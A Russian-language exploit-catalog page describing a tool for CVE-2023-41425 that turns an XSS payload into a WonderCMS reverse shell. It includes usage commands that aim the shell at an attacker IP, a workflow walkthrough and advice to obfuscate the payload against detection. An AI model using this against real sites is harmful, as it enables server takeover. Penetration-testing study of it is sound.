Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-41425-RCE-WonderCMS-4.3.2 — Автоматизирует создание и размещение JavaScript XSS-пейлоада для установки вредоносного модуля темы, вызывающего reverse shell через удалённое выполнение кода в WonderCMS. Этот инструмент использует PHP reverse shell скрипт PentestMonkey в качестве пейлоада. | Kitploit
Инструменты/GitHubGitHub/tea-on/cve-2023-41425-rce-wondercms-4.3.2
Инструменты фишингаГенерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
tea-on/cve-2023-41425-rce-wondercms-4.3.2

CVE-2023-41425-RCE-WonderCMS-4.3.2

Автоматизирует создание и размещение JavaScript XSS-пейлоада для установки вредоносного модуля темы, вызывающего reverse shell через удалённое выполнение кода в WonderCMS. Этот инструмент использует PHP reverse shell скрипт PentestMonkey в качестве пейлоада.

Репозиторий
81 год назадЕщё не проверено

🚨 Инструмент эксплуатации RCE для WonderCMS (CVE-2023-41425)

Этот инструмент для наступательного тестирования безопасности, написанный на Python, автоматизирует эксплуатацию уязвимости удалённого выполнения кода (RCE) в WonderCMS 4.3.2, а именно CVE-2023-41425. Он упрощает процесс создания вредоносного ZIP-модуля темы и доставки XSS-пейлоада на основе JavaScript для перехвата сессии администратора и развёртывания PHP-реверс-шелла.

⚠️ Только для образовательных целей и авторизованного тестирования безопасности.


📚 Оглавление

  • ⚙️ Возможности
  • 📥 Установка и требования
  • 🚀 Примеры использования
  • 🧾 Справочник аргументов
  • 🧠 Подробный рабочий процесс
  • 🔐 Заметки по безопасности
  • 📝 Лицензия и авторство

⚙️ Возможности

  • Создаёт вредоносный ZIP-архив со встроенным PHP-реверс-шеллом
  • Формирует XSS-пейлоад на основе JavaScript для перехвата сессий администратора
  • Извлекает CSRF-токены и автоматизирует процесс установки модуля
  • Запускает локальный HTTP-сервер для размещения файлов эксплойта
  • Совместим с Kali Linux, ParrotOS и Python 3.6+

📥 Установка и требования

🔧 Требования

  • Python 3.6+
  • Совместим с Linux и macOS
  • Протестировано на Kali Linux

📦 Зависимости

Скрипт использует только стандартную библиотеку Python. Внешние пакеты не требуются.

🛠 Установка

UNIX

root@kitploit:~
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip

unzip main.zip

cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main

Windows

root@kitploit:~
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git

cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2

🚀 Примеры использования

💻 Bash

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php

🪟 PowerShell (рекомендуется WSL)

root@kitploit:~
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php

🧾 Справочник аргументов


🧠 Подробный рабочий процесс

Вот что скрипт делает под капотом:

  1. Разбор аргументов:

    • Использует argparse для сбора обязательных и необязательных входных данных от атакующего.
  2. Подготовка реверс-шелла:

    • Считывает предоставленный PHP-реверс-шелл.
    • Заменяет заполнители $ip и $port переданными значениями -H и -p.
  3. Создание вредоносного ZIP:

    • Создаёт структуру каталогов вида: <dir_name>/<php_reverse_shell.php>.
    • Сжимает её в <zip_name>.zip.
  4. Генерация XSS-пейлоада (script.js):

    • Извлекает CSRF-токен со страницы входа цели путём разбора DOM.
    • Формирует URL установки модуля с размещённым ZIP-файлом.
    • Устанавливает вредоносную тему, запуская реверс-шелл.
  5. Инструкции и размещение эксплойта:

    • Выводит команду для слушателя nc.
    • Показывает полный URL доставки XSS.
    • Запускает простой HTTP-сервер для размещения ZIP- и JS-файлов.

🔐 Заметки по безопасности

  • 🧹 Очистка: после использования всегда удаляйте созданные ZIP-файлы, JS-пейлоады и журналы HTTP-сервера.
  • 👀 Обнаружение: эксплойт может быть зарегистрирован в журналах WonderCMS или обнаружен WAF.
  • 🧪 Тестируйте ответственно: атакуйте только те системы, на тестирование которых у вас есть явное разрешение.
  • 🔒 Усиление реверс-шеллов: рассмотрите обфускацию или шифрование PHP-пейлоада для обхода обнаружения.

📝 Лицензия и авторство

Этот инструмент предоставляется по лицензии MIT.
Создано с 🔥 автором TeaOnHack🧋.

  • Ссылка на CVE: CVE-2023-41425
  • WonderCMS: https://www.wondercms.com/

Этот проект предназначен только для образовательных целей и авторизованных оценок безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Скачать инструмент
АргументОбязательныйОписаниеПо умолчанию
-u✅URL страницы входа WonderCMS (например, http://target/index.php?...)—
-H, --host✅IP-адрес атакующего (для реверс-шелла)—
-p✅Порт прослушивания атакующего—
-r, --reverse-shell✅Путь к скрипту PHP-реверс-шелла—
--dir-name❌Каталог внутри ZIP-архива темыTeaOn
--http-port❌Порт для локального HTTP-сервера3000
--zip-name❌Имя создаваемого ZIP-файлаreverse-shell